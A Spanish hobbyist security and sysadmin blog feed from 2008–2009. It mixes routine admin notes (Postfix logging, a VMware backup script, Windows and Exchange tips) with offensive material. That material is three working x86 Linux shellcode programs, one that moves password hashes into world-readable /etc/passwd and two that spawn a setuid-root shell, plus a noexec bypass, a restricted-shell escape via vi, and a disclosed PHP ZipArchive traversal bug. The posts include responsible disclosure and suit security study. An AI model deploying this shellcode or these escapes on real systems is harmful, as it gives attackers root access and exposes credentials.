~Unix & Cisco & Hacks~

...una historia inofensiva pero real ~ XSS en la web de la Guardia Civil ~

noreply@blogger.com (vlan7) — Thu, 09 Jul 2009 19:36:00 +0000

Pues nada, un XSS que descubri el otro dia jugando.

Ahi va:

Full Disclosure 100% DIY (esto es, a mi manera)
donde se habla de una historia
inofensiva pero real
~ XSS en la web de la Guardia Civil ~
Por/By: vlan7 [ http://vlan7.blogspot.com ]
~
Fecha de descubrimiento y contacto con la Guardia Civil: 5-Jul-09
Fecha en la que la Guardia Civil responde confirmándolo: 6-Jul-09
Fecha en la que este XSS queda mitigado: 7-Jul-2009
¿Full Disclosure? released to the public: 10-Jul-2009
~

"No hemos hecho nada del otro mundo, porque vivimos en este"
Eskorbuto

P.D. No es mi especialidad la seguridad web, cualquier correccion sera bienvenida. Gracias.

He añadido un archivo .ZIP con las referencias, que realmente es lo mejor del documento :D Hay alguno bastante bueno.

Referencias

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=56031

unshadow.c shellcode

noreply@blogger.com (vlan7) — Sat, 04 Jul 2009 22:13:00 +0000

Esta shellcode deshabilita el shadowing en un sistema Linux. Todos los passwords de /etc/shadow van a /etc/passwd , legible por todo el mundo :)

#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
"\xb0\x0b" //mov al,0bh
"\x52" //push edx /Termina la cadena con un 0
"\x68\x63\x6f\x6e\x76" //push dword "conv"
"\x68\x70\x77\x75\x6e" //push dword "pwun"
"\x68\x62\x69\x6e\x2f" //push dword "bin/"
"\x68\x73\x72\x2f\x73" //push dword "sr/s"
"\x68\x2f\x2f\x2f\x75" //push dword "///u"
"\x89\xe3" //mov ebx,esp
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h

void main()
{
printf("\n~ This shellcode disables shadowing on a linux system ~"
"\n\n\t ~ Coded by vlan7 ~"
"\n\t ~ http://vlan7.blogspot.com ~"
"\n\n ~ Date: 4/Jul/2009"

"\n\tYou'll have the passwords stored in /etc/passwd."
"\n\tFor undo purposes use the pwconv command."
"\n\t ~ Cheers go to: Wadalbertia"
"\n\t ~ Shellcode Size: %d bytes\n\n",
sizeof(sc)-1);

(*(void (*)()) sc)();
}

Y sigue el culebron... Smallest (27 bytes) GNU/Linux x86 setuid/execve shellcode without NULLs

noreply@blogger.com (vlan7) — Sat, 04 Jul 2009 18:28:00 +0000

Como no sabia que era imposible lo hice

27 bytes!!! :)

#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push/pop!
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) should returns 0 right? ;)
"\xb0\x0b" //mov al,0bh
"\x52" //push edx /Termina la cadena //bin/sh con un 0
"\x68\x6e\x2f\x73\x68" //push dword "hs/n"
"\x68\x2f\x2f\x62\x69" //push dword "ib//"
"\x89\xe3" //mov ebx,edx
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h

int main()
{
printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE "
"WITHOUT NULLS THAT SPAWNS A SHELL"
"\n\nCoded by vlan7"
"\n\t + vlan7[at]bigfoot.com"
"\n\t + http://vlan7.blogspot.com"
"\n\n[+] Date: 4/Jul/2009"
"\n[+] Thanks to: sch3m4"
"\n\n[+] Shellcode Size: %d bytes\n\n",
sizeof(sc)-1);
(*(void (*)()) sc)();
return 0;
}

Voy a citar de aqui el funcionamiento de setuid().

RETURN VALUE

Upon successful completion, 0 shall be returned. Otherwise, -1 shall be returned and errno set to indicate the error.

ERRORS

The setuid() function shall fail, return -1, and set errno to the corresponding value if one or more of the following are true:

Veamos si entramos en alguno de los casos:

[EINVAL]
The value of the uid argument is invalid and not supported by the implementation

No. UID=0 es un UID valido. Es el r00t!

[EPERM]
The process does not have appropriate privileges and uid does not match the real user ID or the saved set-user-ID.

Logicamente, esto ultimo puede pasar en la version a la que se llego anteriormente.

Ah, y aqui el hilo de Wadalbertia:

Smallest GNU/Linux x86 setuid/execve shellcode without NULLs

Stay clean,

XSS

noreply@blogger.com (vlan7) — Sat, 04 Jul 2009 07:26:00 +0000

El otro dia estuve jugando con XSS, y mande algunos a la conocida xssed.com

http://www.xssed.com/archive/author=vlan7/

Quiero dedicar primero muy especialmente este:

http://www.lsi.upc.edu

dedicado, con cariño, a todos los profesores que tuve que aguantar en su dia del departamento de LSI de la FIB de la UPC; por prohibir las soluciones ingeniosas en sus estupidos problemas. Si por ellos fuera nunca aprendo.

Mande varios, pero yo me quedo con ese.

Stay clean,

postfix + logrotate

noreply@blogger.com (vlan7) — Sat, 27 Jun 2009 08:00:00 +0000

LOGUEANDO 2 INSTANCIAS DE POSTFIX EN 2 ARCHIVOS DIFERENTES:
===========================================================

/etc/postfix/main.cf :
----------------------
syslog_facility=local1
syslog_name=postfix_smtpExtern

/etc/postfix-out/main.cf :
--------------------------
syslog_facility=local2
syslog_name=postfix_smtpIntern

/etc/rsyslog.conf :
-------------------
# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;authpriv.none;cron.none;local1.none;local2.none /var/log/messages
(...)
local2.* -/var/log/smtpdIntern.log
local1.* -/var/log/smtpdExtern.log

Reiniciar demonios:
-------------------
/etc/init.d/rsyslog restart
/etc/init.d/postfix restart
/etc/init.d/postfix-out restart

*********************************************************************************

ROTANDO LOS 2 ARCHIVOS DE LOG CON LOGROTATE:
============================================

/etc/logrotate.d/syslog (Postfix usa syslog):
---------------------------------------------
/var/log/smtpdIntern.log {
sharedscripts
missingok
weekly
compress
# delaycompress
create
postrotate
/etc/init.d/rsyslog restart
/etc/init.d/postfix-out reload
endscript
rotate 12
mail user@host.com
}

/var/log/smtpdExtern.log {
sharedscripts
missingok
weekly
compress
# delaycompress
create
weekly
postrotate
/etc/init.d/rsyslog restart
/etc/init.d/postfix reload
endscript
rotate 12
mail user@host.com
}

*********************************************************************************

COMPROBACION FORZANDO ROTACIONES CON LOGROTATE:
===============================================

/usr/sbin/logrotate --force /etc/logrotate.d/syslog

WPA + TKIP. Probando con tkiptun-ng

noreply@blogger.com (vlan7) — Wed, 24 Jun 2009 18:58:00 +0000

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55867

Gracias a Vic_Thor por la info _de primera mano_, pues es muy dificil encontrar informacion sobre esta herramienta.

Ah, salio la version 1.0 para win, aunque no la he probado.

Slowloris - HTTP DoS

noreply@blogger.com (vlan7) — Wed, 24 Jun 2009 18:54:00 +0000

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55898

Gracias Sor_Zitroen por la noticia!

Jugando a robar cookies con surfjack

noreply@blogger.com (vlan7) — Tue, 23 Jun 2009 08:49:00 +0000

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55853

Jugando y burlando a SSL con SSLStrip

noreply@blogger.com (vlan7) — Mon, 22 Jun 2009 10:48:00 +0000

http://www.wadalbertia.org/phpBB2/viewtopic.php?p=55846

PD Gracias al compañero Popolous por el post-it ;)

VMWare disaster recovery

noreply@blogger.com (vlan7) — Wed, 03 Jun 2009 16:35:00 +0000

La idea es tener una tarea cron que copie las maquinas virtuales de un host fisico a otro host fisico VMWare.

No se realiza escritura a disco, pues en VMWare es lo que mas penalizado se ve. Se comprime todo en un lado del tunel ssh, y por el otro lado se va descomprimiendo.

Ahi va:

#!/bin/bash
#
#Copia VMs de FISICA1 a FISICA2 para Disaster Recovery
#
#vlan7 / 13-5-09
#

ALERTA=80 #20% espacio libre
ssh fisica2 df -HP |grep mapper | awk '{ print $5 " " $1 }' |awk '{ print $1}' | cut -d'%' -f1 >/tmp/output
uso=$(cat /tmp/output)

if [ $uso -g $ALERTA ]; then
echo "$uso % de espacio utilizado a fisica2, abortando copia" >>/var/log/copiaVMsVMWare.log
fi

if [ $uso -le $ALERTA ]; then
#host1
echo "Apagando la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd stop "[standard] host1/host1.vmx" soft
echo "Apagada la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
tar czvf - /var/lib/vmware/Virtual\ Machines/host1/ |ssh fisica2 "cd / ; tar xzvf -"
echo "Encendiendo la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log
vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd start "[standard] host1/host1.vmx"
echo "Encendida la VM host1 - $(date)" >>/var/log/copiaVMsVMWare.log

#list all available VMs to log
vmrun -T server -h https://fisica1:8333/sdk -u user -p passwd list >>/var/log/copiaVMsVMWare.log
fi

#enviando correo
tail -100 /var/log/copiaVMsVMWare.log | mail -s "[script] copiaVMsVMWare.sh" user@host.com

Asistente agregar impresoras linea de comandos

noreply@blogger.com (vlan7) — Fri, 13 Mar 2009 16:29:00 +0000

RUNDLL32 PRINTUI.DLL,PrintUIEntry /il

Mas ejemplos en http://www.robvanderwoude.com/2kprintcontrol.php

A mi me fue util en una ocasion...

Equipos wireless iniciar sesion en dominio

noreply@blogger.com (vlan7) — Wed, 25 Feb 2009 18:09:00 +0000

Si un equipo nunca ha iniciado sesion en un dominio, no tendra guardadas las credenciales en cache. Esto es un problema para equipos wifi que quieran iniciar sesion en el dominio de nuestra organizacion.

Y aunque tengan guardadas las credenciales en cache, no se ejecutara en su maquina ningun logonscript.

La solucion es cargar y activar la tarjeta wifi antes del inicio de sesion, antes de autenticarse.

Yo me quedo con esta manera de hacerlo:

1. Usar el servicio Windows Zero Configuration (Inicio de sesion wifi facil o algo asi se llama en castellano)

2. regedit. HKLM \ Software \ Microsoft \ WindowsNT \ CurrentVersion \ Winlogon
Añadir valor DWORD GpNetworkStartTimeoutPolicyValue 3c (hexa) o 60 (dec)

3. regedit. HKLM \ Software \ Policies \ Microsoft \ Windows \ System
Añadir valor DWORD GroupPolicyMinTransferRate a 0.

Y los clientes ya podran iniciar sesion como si estuvieran conectados a la red cableada.

User Profile Deletion Utility (Delprof.exe)

noreply@blogger.com (vlan7) — Wed, 25 Feb 2009 18:08:00 +0000

Delprof.exe is a command-line utility that you can use to delete user profiles on a local or remote computers running Windows 2000, Windows XP, and Windows Server 2003.

http://www.microsoft.com/downloads/details.aspx?familyid=901a9b95-6063-4462-8150-360394e98e1e&displaylang=en

VMWare. Ubuntu/Debian eth0 desaparece

noreply@blogger.com (vlan7) — Tue, 17 Feb 2009 13:34:00 +0000

Tras copiar una VM, eth0 desaparece.

Asi lo arregle yo:

Editar:

En Ubuntu: /etc/udev/rules.d/70-persistent-net.rules
En Debian: /etc/udev/rules.d/z25-persistent-net.rules

Borrar la primera entrada y cambiar en la segunda eth1 por eth0.

Reiniciar servicios asociados:

/etc/init.d/udev restart
/etc/init.d/networking restart

No es necesario reiniciar el host.

<EDIT 23-2-09>
Si seleccionamos mover nos olvidamos de este problema, ya que se mantiene todo el estado de la maquina, direccion MAC incluida. Esto viene bien en un entorno donde se quiera una altadisponibilidad con una VM de backup que en caso de fallo de una podamos levantar la otra.
</EDIT 23-2-09>

VMWare tools Ubuntu

noreply@blogger.com (vlan7) — Tue, 17 Feb 2009 09:37:00 +0000

Click en Instalar VMWare tools

sudo su

Montar cdrom

tar xzvf VMWare*.tar.gz (a /tmp)

apt-get install gcc make

apt-get install linux-headers`uname -r`

ln -s /usr/src/linux-headers`uname -r` /usr/src/linux

./vmware-install.pl

Win. Ofrecer asistencia remota en la LAN

noreply@blogger.com (vlan7) — Sat, 14 Feb 2009 11:43:00 +0000

hcp://CN=Microsoft%20Corporation,L=Redmond,S=Washington,C=US/Remote%20Assistance/Escalation/Unsolicited/unsolicitedrcui.htm

Esto es con permiso del usuario.

0-day in ZipArchive's PHP

noreply@blogger.com (vlan7) — Wed, 28 Jan 2009 20:03:00 +0000

Hoy me puse en contacto con el "security response team" de PHP sobre un bug que descubri en ZipArchive de PHP que, que yo sepa, no habia sido hecho publico.

Pues bien, hoy mismo me han respondido, y como ya esta solucionado, aqui pongo el mail que les mande:

On Wed, Jan 28, 2009 at 4:32 PM, vlan7 wrote:
> Hi!
>
> Recently I've found a vulnerability in ZipArchive's PHP.
>
> An atacker would overwrite any file doing a directory transversal simply
> naming zipped archives somethin' like ../../../../var/www/hack.php
>
> Are you aware of this?

Yes, it is fixed in 5.3.0 and partially fixed in 5.2.x (a bug in a
zend function did not fix it nicely). Everything should be fien in
5.2.9 (RC1 to be released soon).

Thanks for your report!

Cheers,

html mailto tag encoder antispam

noreply@blogger.com (vlan7) — Wed, 28 Jan 2009 15:10:00 +0000

http://rumkin.com/tools/mailto_encoder/custom.php

*nix. Saltando restriccion noexec + evadiendo una shell restrictiva

noreply@blogger.com (vlan7) — Wed, 28 Jan 2009 14:49:00 +0000

Si un buen administrador ha incluido en el fstab (vfstab en solaris) la opcion noexec para montaje de la particion digamos /home del usuario, su idea seria que el usuario no pudiera ejecutar programas bajados por el, es decir, que residan en la particion montada como noexec.

Al intentar ejecutar un script con ./script.sh

No nos lo permite el sistema.

Podemos saltarnos esta restriccion anteponiendo el script en el que esta programado. Por ejemplo:

/bin/bash script.sh

Para archivos binarios ejecutables, y esto es en Linux:

/lib/ld-linux.so.2 binario

Como administradores se nos podria ocurrir quitar el permiso de ejecucion a ld-linux.so.2 , pero ¿que sistema no tiene alguna libreria dinamicamente enlazada? Asi que esa no es una solucion viable.

Lo que podemos hacer es dar al usuario una shell restrictiva tipo bash-r como shell por defecto en el /etc/passwd

Con esto lo que hacemos es una jaula en la que el usuario no puede ejecutar programas que no esten en el PATH, y por supuesto, no puede modificar la variable PATH.

Bien, como todo lo que una mente humana puede asegurar, otra mente humana puede violar, como atacantes procederiamos asi.

El viejo editor vi tiene una opcion para ejecutar comandos de shell.

probador:~$ cd ..
rbash: cd: restricted
probador:~$ vi prueba.sh

Y en vi:

:set shell=/bin/bash
:shell
probador:~$ cd ..
probador:/home$

Suerte,

Sobre espacio ocupado por la bd de Active Directory

noreply@blogger.com (vlan7) — Wed, 28 Jan 2009 12:58:00 +0000

Algunos administradores lo que hacen para conocer el espacio ocupado por la bd de AD es usar el comando:

ntdsutil files info

El problema es que este comando da error si no es ejecutado en modo Restauracion de AD.

Realmente la solucion es mucho mas sencilla. _Toda_ la bd de AD se encuentra en el archivo ntds.dit. Lo que pese el archivo es el tamaño de la bd de AD.

Es desfragmentable y es posible ver cuanto espacio en HD podemos ganar (tras eliminar objetos de AD) mediante una desfragmentacion que tanto puede ser online como offline. Google.

Migracion Exchange 5.5 -> 2003

noreply@blogger.com (vlan7) — Mon, 19 Jan 2009 08:56:00 +0000

Esto es lo que he recuperado de un .doc que tenia sobre migraciones de Exchange 5.5 a versiones superiores. No es necesario pasar por 2000. A destacar que 5.5 usaba su propio Directorio, por lo que es necesario integrarlo en AD.

MIGRACIÓN
EXCHANGE 5.5->2003

Requisitos DC:

-W2k3 Server (Todas las funcionalidades
de Exchange 2k3) Recomendado

-W2k Server SP3

Requisitos Exchange 2k3:

2GB RAM

HD mínimo = Tamaño medio
buzón * Num users

NTFS

IIS

Servicio SMTP

Servicio NNTP (aunque no se
use)

Otros (ASP.NET, .Net Framework)

Migración 5.5 ->
2k3:

(0.- Migración a AD) <-
Sólo si el DC es NT. Backup previo

1.- Instalación + Config Conector
de AD

2.- Instalación Exchange 2k3
en organización actual

3.- Migración datos

4.- ~~Eliminación~~
Desconexión cable red Exchange 5.5

Aquí ya estamos operativos.
Default mode: Mixto

5.- Comprobación + Paso del
tiempo

(6.- Paso a Modo Nativo)<-Opcional.
Más óptimo que Mixto. Irreversible.

Seguridad,
Administración:

(…)

% CPU limiters

noreply@blogger.com (vlan7) — Sat, 17 Jan 2009 08:12:00 +0000

CPU Usage Limiter for Linux

BES – Battle Encoder Shirase 1.3.8 for Windows XP/2000

PostIt: Smallest GNU/Linux x86 setuid/execve shellcode without NULLs

noreply@blogger.com (vlan7) — Tue, 25 Nov 2008 21:53:00 +0000

Aqui esta todo lo que tengo que decir, en una de mis casas:

http://www.wadalbertia.org/phpBB2/viewtopic.php?t=5139

Gracias NeTTinG por hacerlo post-it, da gusto Wadalbertia, da gusto, de verdad :) Y a sch3ma de Opensec, he has initiated the funny game :)

Si me lo permitis or recomiendo un buen libro del que me he podido empapar de bastante informacion:

Writing Security Tools and Exploits, de Syngress.

Ah, por esta vez paso de mandarlo a ningun lado, yo ya estoy contento desprendiendo conocimiento a mi alrededor, mucho o poco, pero conocimiento. Total que.

Suerte y Exitos.

Bit Twiddling Hacks

noreply@blogger.com (vlan7) — Sat, 22 Nov 2008 09:32:00 +0000

Bit Twiddling Hacks
By Sean Eron Anderson
seander@cs.stanford.edu

Individually, the code snippets here are in the public domain (unless otherwise noted) — feel free to use them however you please. The aggregate collection and descriptions are © 1997-2005 Sean Eron Anderson. The code and descriptions are distributed in the hope that they will be useful, but WITHOUT ANY WARRANTY and without even the implied warranty of merchantability or fitness for a particular purpose. As of May 5, 2005, all the code has been tested thoroughly. Thousands of people have read it. Moreover, Professor Randal Bryant, the Dean of Computer Science at Carnegie Mellon University, has personally tested almost everything with his Uclid code verification system. What he hasn't tested, I have checked against all possible (32-bit) inputs. To the first person to inform me of a legitimate bug in the code, I'll pay a bounty of US$10 (by check or Paypal). If directed to a charity, I'll pay US$20.

Bit Twiddling Hacks

Smallest GNU/Linux x86 setuid/execve shellcode without NULLs

noreply@blogger.com (vlan7) — Wed, 19 Nov 2008 15:03:00 +0000

Bueno, consegui mejorar un poco la genial shellcode de Chema Garcia de opensec.

Ahora soy yo el que tiene la shellcode mas pequeña del mundo haha (aun basandome -muchisimo, solo cambie un par de lineas- en la suya).

Yo consegui reducirla 1 byte. 26 bytes.

Ahora... ¿quien es el siguiente? ;)

Ahi va:

/*
Smallest GNU/Linux x86 setuid/execve shellcode without NULLs
(based on Chema Garcia, aka sch3m4's code from opensec)
(shrinked down only for the fun of gettin' the most minimalistic shellcode possible)

vlan7 - 19/11/2008
http://vlan7.blogspot.com

Shellcode size: 26 bytes
*/

#include <stdio.h>

char sc[] =
"\x31\xc9" //xor ecx,ecx
"\x8d\x41\x17" //lea eax,[ecx+17h]
"\x60" //pusha
"\xcd\x80" //int 80h
"\x61" //popa
"\x51" //push ecx
"\x68\x6e\x2f\x73\x68" //push 0x68732f6e
"\x68\x2f\x2f\x62\x69" //push 0x69622f2f
"\x89\xe3" //mov ebx,esp
"\xb0\x0b" //mov al,0bh
"\xcd\x80"; //int 80h

void main() {
printf("Smallest GNU/Linux x86 setuid/execve shellcode without NULLs"
"\n(based on Chema Garcia, aka sch3m4's code from opensec)"
"(only for the fun of gettin' the most minimalistic shellcode possible)"
"\n\nvlan7 - 19/11/2008"
"\nhttp://vlan7.blogspot.com"
"\n\nShellcode size: %d bytes\n", sizeof(sc)-1);
(*(void (*)()) sc)();
}

-Mi shellcode en Packetstorm:
http://packetstormsecurity.org/filedesc/smallest_setuid_execve_sc.c.html

-Mi shellcode en Wadalbertia (con comentarios nuestros):
http://www.wadalbertia.org/phpBB2/viewtopic.php?t=5139

-La shellcode de Chema Garcia (gracias Chema):
http://opensec.es/2008/11/14/gnulinux-x86-setuid0-execvebinsh00-shellcode-without-null/